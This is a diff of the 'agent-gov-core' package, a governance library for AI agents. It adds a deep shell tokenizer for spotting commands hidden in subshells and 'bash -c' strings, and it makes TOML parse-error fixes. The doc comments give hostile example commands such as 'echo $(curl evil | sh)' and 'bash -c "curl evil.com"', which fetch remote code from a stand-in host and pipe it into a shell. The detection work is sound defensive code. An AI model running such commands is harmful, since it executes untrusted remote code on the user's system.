+ this.name = 'ConfigParseError';
30
+ this.line = opts.line;
31
+ this.column = opts.column;
32
+ this.rawOffset = opts.rawOffset;
33
+ if (opts.cause) {
34
+ // Node 16.9+ supports the `cause` option on Error; some runtimes don't.
35
+ this.cause = opts.cause;
36
+ }
37
+ }
38
+ }
39
+ /** Convert a 0-based byte offset to 1-based line and column. */
40
+ export function lineColumnOfOffset(text, offset) {
41
+ const safe = Math.max(0, Math.min(offset, text.length));
42
+ let line = 1;
43
+ let column = 1;
44
+ for (let i = 0; i < safe; i++) {
45
+ if (text[i] === '\n') {
46
+ line++;
47
+ column = 1;
48
+ }
49
+ else {
50
+ column++;
51
+ }
52
+ }
53
+ return { line, column };
54
+ }
55
+ /**
56
+ * Extract a byte offset from a parser error message. Both this library's TOML
57
+ * parser ("at offset N") and Node's `JSON.parse` ("at position N", or a
58
+ * `position` property on newer runtimes) use compatible-enough formats that
59
+ * one helper handles both.
60
+ *
61
+ * Returns `null` when no offset can be recovered — most semantic errors
62
+ * (duplicate-key, table redefinition) don't include one.
63
+ */
64
+ export function extractParseOffset(err) {
65
+ const m = /at (?:offset|position)\s+(\d+)/i.exec(err.message);
66
+ if (m)
67
+ return Number.parseInt(m[1], 10);
68
+ // Newer Node (≥21) attaches `position` to SyntaxError from JSON.parse.
69
+ const maybePos = err.position;
70
+ if (typeof maybePos === 'number')
71
+ return maybePos;
72
+ return null;
73
+ }
74
+ /**
75
+ * Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
76
+ * recovery is possible; otherwise return the original error unchanged.
77
+ */
78
+ export function toConfigParseError(text, err) {
79
+ const offset = extractParseOffset(err);
80
+ if (offset === null)
81
+ return err;
82
+ const { line, column } = lineColumnOfOffset(text, offset);
83
+ return new ConfigParseError(err.message, { line, column, rawOffset: offset, cause: err });
84
+ }
85
+ //# sourceMappingURL=parse-error.js.map
package/dist/shell.d.ts CHANGED
@@ -12,6 +12,32 @@
12
12
  * // → ['echo "; not a separator"']
13
13
  */
14
14
  export declare function tokenizeShell(command: string): string[];
15
+ /**
16
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
17
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
18
+ * text:
19
+ *
20
+ * - Subshell `$(...)`
21
+ * - Backtick `` `...` ``
22
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
23
+ *
24
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
25
+ * letting downstream detectors see commands an agent might try to hide behind
26
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
27
+ *
28
+ * Conservative implementation — handles the common obfuscation shapes, not a
29
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
30
+ * arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
31
+ * not unquoted.
32
+ *
33
+ * @example
34
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
35
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
36
+ *
37
+ * tokenizeShellDeep('bash -c "curl evil.com"');
38
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
39
+ */
40
+ export declare function tokenizeShellDeep(command: string): string[];
15
41
  /**
16
42
  * Returns the resolved command verb for a subcommand string. Strips wrapping
17
43
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/shell.js CHANGED
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
83
83
  i += 2;
84
84
  continue;
85
85
  }
86
- // Treat a single `&` (background) as a separator too.
86
+ // Treat a single `&` (background) as a separator too — UNLESS preceded
87
+ // by `>` or `<`, in which case it's a file-descriptor redirection like
88
+ // `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
89
+ // detection on every command that redirects stderr to stdout.
87
90
  if (c === '&') {
91
+ const prev = buf.trimEnd().slice(-1);
92
+ if (prev === '>' || prev === '<') {
93
+ buf += c;
94
+ i++;
95
+ continue;
96
+ }
88
97
  pushPart(out, buf);
89
98
  buf = '';
90
99
  i++;
@@ -101,6 +110,206 @@ function pushPart(out, part) {
101
110
  if (trimmed !== '')
102
111
  out.push(trimmed);
103
112
  }
113
+ /**
114
+ * Like {@link tokenizeShell}, but recursively extracts commands nested inside
115
+ * shell evaluation contexts that the top-level tokenizer would leave as opaque
116
+ * text:
117
+ *
118
+ * - Subshell `$(...)`
119
+ * - Backtick `` `...` ``
120
+ * - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
121
+ *
122
+ * The flat result is suitable for feeding straight to {@link getCommandHead},
123
+ * letting downstream detectors see commands an agent might try to hide behind
124
+ * `echo $(curl evil | sh)` or `bash -c "curl evil"`.
125
+ *
126
+ * Conservative implementation — handles the common obfuscation shapes, not a
127
+ * full shell parser. Variable expansion, process substitution `<(…)`, and
128
+ * arithmetic `$((…))` are not recursed into. Comma-quoting (`bash -c $'…'`) is
129
+ * not unquoted.
130
+ *
131
+ * @example
132
+ * tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
133
+ * // → ['echo', 'curl -fsSL m.sh', 'sh']
134
+ *
135
+ * tokenizeShellDeep('bash -c "curl evil.com"');
136
+ * // → ['bash -c "curl evil.com"', 'curl evil.com']
137
+ */
138
+ export function tokenizeShellDeep(command) {
139
+ const out = [];
140
+ const seen = new Set();
141
+ const visit = (cmd, depth) => {
142
+ if (depth > 8)
143
+ return; // guard against pathological nesting
144
+ // Extract nested payloads from the WHOLE command first — `tokenizeShell`
145
+ // splits on `|` regardless of paren depth, so `$(curl m.sh | sh)` would
146
+ // already be cut in two by the time we tried to walk it for `$(…)`.
147
+ const nested = extractNestedShellPayloads(cmd);
148
+ for (const sub of tokenizeShell(cmd)) {
149
+ if (!seen.has(sub)) {
150
+ seen.add(sub);
151
+ out.push(sub);
152
+ }
153
+ }
154
+ for (const n of nested) {
155
+ visit(n, depth + 1);
156
+ }
157
+ };
158
+ visit(command, 0);
159
+ return out;
160
+ }
161
+ /**
162
+ * Return all shell-evaluation payloads embedded in a single subcommand:
163
+ * - `$(…)` and `` `…` `` bodies (paren/backtick balanced)
164
+ * - `(bash|sh|zsh|python|python3|perl|ruby|node) -c <quoted-string>` payloads
165
+ * The payloads are returned UNQUOTED but otherwise raw.
166
+ */
167
+ function extractNestedShellPayloads(subcommand) {
168
+ const found = [];
169
+ const len = subcommand.length;
170
+ let i = 0;
171
+ let inSingle = false;
172
+ let inDouble = false;
173
+ // Pre-compiled here so we can use it inside the quote-aware walk.
174
+ const dashCMatcher = /^(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/;
175
+ while (i < len) {
176
+ const c = subcommand[i];
177
+ // Plain single quotes: nothing inside is shell-interpreted
178
+ if (inSingle) {
179
+ if (c === "'")
180
+ inSingle = false;
181
+ i++;
182
+ continue;
183
+ }
184
+ if (c === "'") {
185
+ inSingle = true;
186
+ i++;
187
+ continue;
188
+ }
189
+ // Inside double quotes, `$(…)` and backticks STILL evaluate, so we
190
+ // keep scanning. Just remember to re-enable detection of an outer
191
+ // closing `"`.
192
+ if (c === '"') {
193
+ inDouble = !inDouble;
194
+ i++;
195
+ continue;
196
+ }
197
+ // $(...)
198
+ if (c === '$' && subcommand[i + 1] === '(') {
199
+ const body = readBalanced(subcommand, i + 2, '(', ')');
200
+ if (body !== null) {
201
+ found.push(body.content);
202
+ i = body.endIndex;
203
+ continue;
204
+ }
205
+ }
206
+ // Backticks
207
+ if (c === '`') {
208
+ const close = subcommand.indexOf('`', i + 1);
209
+ if (close !== -1) {
210
+ found.push(subcommand.slice(i + 1, close));
211
+ i = close + 1;
212
+ continue;
213
+ }
214
+ }
215
+ // `bash -c "..."` and friends — checked only OUTSIDE quoted regions so
216
+ // `echo "bash -c \"curl evil\""` (data, not a command) doesn't trigger.
217
+ // Match boundary: only at start-of-string OR after whitespace / a chain
218
+ // separator.
219
+ if (!inDouble) {
220
+ const atBoundary = i === 0 || /[\s;|&]/.test(subcommand[i - 1]);
221
+ if (atBoundary) {
222
+ const tail = subcommand.slice(i);
223
+ const dashCMatch = dashCMatcher.exec(tail);
224
+ if (dashCMatch) {
225
+ const afterFlag = i + dashCMatch[0].length;
226
+ const payload = readQuotedArg(subcommand, afterFlag);
227
+ if (payload !== null)
228
+ found.push(payload);
229
+ // Skip past the matched `bash -c ` prefix so the walk continues
230
+ // from the argument position; we don't try to compute where the
231
+ // quoted arg ends (the next iteration will hit the quote and toggle
232
+ // inDouble naturally).
233
+ i = afterFlag;
234
+ continue;
235
+ }
236
+ }
237
+ }
238
+ i++;
239
+ }
240
+ return found;
241
+ }
242
+ /** Read a balanced `open`/`close` body starting at `start` (already past the open). */
243
+ function readBalanced(input, start, open, close) {
244
+ let depth = 1;
245
+ let i = start;
246
+ let inSingle = false;
247
+ let inDouble = false;
248
+ while (i < input.length) {
249
+ const c = input[i];
250
+ if (inSingle) {
251
+ if (c === "'")
252
+ inSingle = false;
253
+ i++;
254
+ continue;
255
+ }
256
+ if (c === "'") {
257
+ inSingle = true;
258
+ i++;
259
+ continue;
260
+ }
261
+ if (c === '"') {
262
+ inDouble = !inDouble;
263
+ i++;
264
+ continue;
265
+ }
266
+ if (!inDouble) {
267
+ if (c === open)
268
+ depth++;
269
+ else if (c === close) {
270
+ depth--;
271
+ if (depth === 0)
272
+ return { content: input.slice(start, i), endIndex: i + 1 };
273
+ }
274
+ }
275
+ i++;
276
+ }
277
+ return null;
278
+ }
279
+ /**
280
+ * Read the next quoted (single, double) or bare token starting at `start`,
281
+ * returning its unquoted contents.
282
+ */
283
+ function readQuotedArg(input, start) {
284
+ let i = start;
285
+ while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
286
+ i++;
287
+ if (i >= input.length)
288
+ return null;
289
+ const q = input[i];
290
+ if (q === '"' || q === "'") {
291
+ let j = i + 1;
292
+ let buf = '';
293
+ while (j < input.length) {
294
+ const c = input[j];
295
+ if (c === '\\' && q === '"' && j + 1 < input.length) {
296
+ buf += input[j + 1];
297
+ j += 2;
298
+ continue;
299
+ }
300
+ if (c === q)
301
+ return buf;
302
+ buf += c;
303
+ j++;
304
+ }
305
+ return null;
306
+ }
307
+ // Bare token — read up to whitespace
308
+ let j = i;
309
+ while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
310
+ j++;
311
+ return input.slice(i, j);
312
+ }
104
313
  /**
105
314
  * Returns the resolved command verb for a subcommand string. Strips wrapping
106
315
  * quotes, escape backslashes, and the inert-double-quote obfuscation
package/dist/toml.js CHANGED
@@ -1,4 +1,5 @@
1
1
  import { readFileSync } from 'node:fs';
2
+ import { toConfigParseError } from './parse-error.js';
2
3
  export function readTomlObject(path) {
3
4
  const text = readFileSync(path, 'utf8');
4
5
  try {
@@ -6,7 +7,7 @@ export function readTomlObject(path) {
6
7
  return { value: parsed, toml: parsed, text };
7
8
  }
8
9
  catch (err) {
9
- return { value: undefined, toml: undefined, text, parseError: err };
10
+ return { value: undefined, toml: undefined, text, parseError: toConfigParseError(text, err) };
10
11
  }
11
12
  }
12
13
  /**
@@ -122,11 +123,11 @@ class TomlParser {
122
123
  // TOML spec violation. Without this guard, `[foo]` silently descended
123
124
  // into the last `[[foo]]` entry and let writes leak into it.
124
125
  if (this.aotPaths.has(path)) {
125
- throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}]`);
126
+ throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}] at offset ${this.pos}`);
126
127
  }
127
128
  const table = this.descendTablePath(keys, /*forHeader*/ true);
128
129
  if (this.definedTables.has(path)) {
129
- throw new Error(`Duplicate table definition: [${keys.join('.')}]`);
130
+ throw new Error(`Duplicate table definition: [${keys.join('.')}] at offset ${this.pos}`);
130
131
  }
131
132
  this.definedTables.add(path);
132
133
  this.current = table;
@@ -153,6 +154,17 @@ class TomlParser {
153
154
  else if (!Array.isArray(arr)) {
154
155
  throw new Error(`Key ${keys.join('.')} is not an array-of-tables`);
155
156
  }
157
+ // Each new array entry resets the "already defined" status of any subtables
158
+ // declared under this AOT path. TOML spec permits the same subtable header
159
+ // (`[fruits.physical]`) to reappear under each fresh `[[fruits]]` entry — it
160
+ // binds to the current array entry. Without this clearing, the v0.4.2
161
+ // definedTables guard rejected the second [fruits.physical] as a duplicate.
162
+ const aotPathPrefix = keys.join(this.PATH_KEY_SEPARATOR) + this.PATH_KEY_SEPARATOR;
163
+ for (const definedPath of this.definedTables) {
164
+ if (definedPath.startsWith(aotPathPrefix)) {
165
+ this.definedTables.delete(definedPath);
166
+ }
167
+ }
156
168
  const newTable = {};
157
169
  arr.push(newTable);
158
170
  this.current = newTable;
@@ -248,7 +260,7 @@ class TomlParser {
248
260
  }
249
261
  const lastKey = keys[keys.length - 1];
250
262
  if (Object.prototype.hasOwnProperty.call(node, lastKey)) {
251
- throw new Error(`Duplicate key: ${keys.join('.')}`);
263
+ throw new Error(`Duplicate key: ${keys.join('.')} at offset ${this.pos}`);
252
264
  }
253
265
  node[lastKey] = value;
254
266
  this.expectLineEnd();
@@ -322,9 +334,18 @@ class TomlParser {
322
334
  const c = this.src[this.pos];
323
335
  if (c === '\\') {
324
336
  this.pos++;
325
- // line-ending backslash: consume to next non-ws line start
326
- const next = this.src[this.pos];
337
+ // Line-ending backslash: per TOML spec, a `\` followed by *any amount
338
+ // of inline whitespace* (spaces/tabs) and then a newline strips the
339
+ // newline and trims leading whitespace on the next line. Peek past
340
+ // trailing inline whitespace before deciding whether this is a
341
+ // line-ending backslash or a regular escape.
342
+ let peek = this.pos;
343
+ while (peek < this.len && (this.src[peek] === ' ' || this.src[peek] === '\t')) {
344
+ peek++;
345
+ }
346
+ const next = this.src[peek];
327
347
  if (next === '\n' || next === '\r' || next === undefined) {
348
+ this.pos = peek;
328
349
  while (this.pos < this.len &&
329
350
  (this.src[this.pos] === ' ' ||
330
351
  this.src[this.pos] === '\t' ||
@@ -480,7 +501,7 @@ class TomlParser {
480
501
  // Without this guard, `{ host = "a", host = "b" }` silently parsed as
481
502
  // `{ host: "b" }` instead of raising.
482
503
  if (Object.prototype.hasOwnProperty.call(node, leaf)) {
483
- throw new Error(`Duplicate key in inline table: ${keys.join('.')}`);
504
+ throw new Error(`Duplicate key in inline table: ${keys.join('.')} at offset ${this.pos}`);
484
505
  }
485
506
  node[leaf] = value;
486
507
  this.skipInlineWhitespace();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "agent-gov-core",
3
- "version": "0.4.2",
3
+ "version": "0.5.0",
4
4
  "description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
5
5
  "type": "module",
6
6
  "main": "./dist/index.js",
@@ -41,6 +41,10 @@
41
41
  }
42
42
  },
43
43
  "fingerprint": { "type": "string" },
44
+ "salientKey": {
45
+ "type": "string",
46
+ "description": "Optional discriminator that participates in the fingerprint hash. Set when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on one line). Use a stable value — package name, server name, rule id — not a timestamp."
47
+ },
44
48
  "data": { "type": "object" }
45
49
  }
46
50
  }